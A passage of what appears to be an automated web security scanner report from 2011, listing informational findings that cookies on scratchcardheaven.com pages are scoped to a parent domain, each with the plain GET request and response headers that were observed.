Date: Mon, 16 May 2011 12:18:35 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:18:35 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:18:35 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:18:35 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:18:35 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:18:35 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Vary: Accept-Encoding
Content-Length: 45693


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.209. http://www.scratchcardheaven.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratchcardheaven.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.scratchcardheaven.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 16 May 2011 11:41:48 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=1154wovrqoflk555jcnrqhat; path=/; HttpOnly
Set-Cookie: CSI_8=EncryptedUniqueVisitorID=A46351914A3EDB19C738924288C71FD1&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratchcardheaven.com; expires=Fri, 16-May-2031 11:41:48 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 11:41:48 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 11:41:48 GMT; path=/
Set-Cookie: UniqueVisitorID=A46351914A3EDB19C738924288C71FD1; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 11:41:48 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 11:41:48 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 11:41:48 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Vary: Accept-Encoding
Content-Length: 44431


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.210. http://www.scratchcardheaven.com/AboutUs.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratchcardheaven.com
Path:   /AboutUs.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AboutUs.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:27:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:27:01 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:27:01 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:27:01 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:27:01 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:27:01 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47358


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.211. http://www.scratchcardheaven.com/ContactUsMail.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratchcardheaven.com
Path:   /ContactUsMail.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ContactUsMail.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:30:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:19 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:19 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:19 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:19 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:19 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 52526


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.212. http://www.scratchcardheaven.com/FairPlay.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratchcardheaven.com
Path:   /FairPlay.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FairPlay.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:30:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:27 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:27 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:27 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:27 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:27 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46160


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.213. http://www.scratchcardheaven.com/Help.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratchcardheaven.com
Path:   /Help.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Help.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:30:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:17 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:17 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:17 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:17 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:17 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45289


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.214. http://www.scratchcardheaven.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratchcardheaven.com
Path:   /Home.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Home.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:30:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:33 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:33 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:33 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:33 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:33 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44431


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.215. http://www.scratchcardheaven.com/InviteFriend.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratchcardheaven.com
Path:   /InviteFriend.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /InviteFriend.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:29:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:29:51 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:29:51 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:29:51 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:29:51 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:29:51 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 56912


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.216. http://www.scratchcardheaven.com/PlayersClub.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratchcardheaven.com
Path:   /PlayersClub.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PlayersClub.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:30:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:17 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:17 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:17 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:17 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:17 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 53351


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.217. http://www.scratchcardheaven.com/Promotions.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratchcardheaven.com
Path:   /Promotions.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Promotions.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:30:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:14 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:14 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:14 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:14 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:14 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47617


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.218. http://www.scratchcardheaven.com/Responsible.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratchcardheaven.com
Path:   /Responsible.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Responsible.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:30:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:27 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:27 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:27 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:27 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:27 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 51035


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.219. http://www.scratchcardheaven.com/SecurityAndPrivacy.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratchcardheaven.com
Path:   /SecurityAndPrivacy.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /SecurityAndPrivacy.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:30:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:26 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:26 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:26 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:26 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:26 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44755


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.220. http://www.scratchcardheaven.com/Terms.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratchcardheaven.com
Path:   /Terms.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Terms.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:30:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:21 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:21 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:21 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:21 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:21 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 107721


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.221. http://www.scratchcardheaven.com/UnderAge.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratchcardheaven.com
Path:   /UnderAge.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /UnderAge.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:30:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
